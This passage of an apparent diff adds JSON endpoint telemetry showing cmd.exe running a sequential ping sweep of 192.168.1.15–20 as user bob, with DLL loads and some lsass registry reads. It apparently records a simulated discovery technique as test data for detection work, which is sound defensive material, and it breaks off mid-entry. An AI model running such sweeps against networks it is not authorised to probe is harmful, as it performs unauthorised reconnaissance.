"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572052140000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "event_type": "process", + "pid": 3452, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572056840000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-0010C8905101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.15", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5572, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572056980000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572056990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "event_type": "process", + "pid": 5572, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572061990000, + "unique_pid": "{42FC7E13-CB55-5C05-0000-001044935101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.16", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6380, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572062140000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "event_type": "process", + "pid": 6380, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572066840000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-001092975101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.17", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4864, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572066990000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "event_type": "process", + "pid": 4864, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572071840000, + "unique_pid": "{42FC7E13-CB56-5C05-0000-00107D9A5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.18", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6964, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572071990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "event_type": "process", + "pid": 6964, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572076990000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-0010F09C5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.19", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 792, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572077140000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "event_type": "process", + "pid": 792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572081830000, + "unique_pid": "{42FC7E13-CB57-5C05-0000-00106A9F5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.20", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4808, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4808, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572081990000, + "unique_pid": "{42FC7E13-CB58-5C05-0000-0010DBA15101}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeHigh", + "registry_value": "SecureTimeHigh", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeEstimated", + "registry_value": "SecureTimeEstimated", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\SecureTimeLow", + "registry_value": "SecureTimeLow", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_value": "RunTime", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime\\SecureTimeTickCount", + "registry_value": "SecureTimeTickCount", + "timestamp": 131883572084490000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010CEB00000}" + }, + { + "event_type": "registry", + "pid": 604, + "process_name": "lsass.exe", + "process_path": "C:\\WINDOWS\\system32\\lsass.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\W32Time\\SecureTimeLimits\\RunTime", + "registry_path": 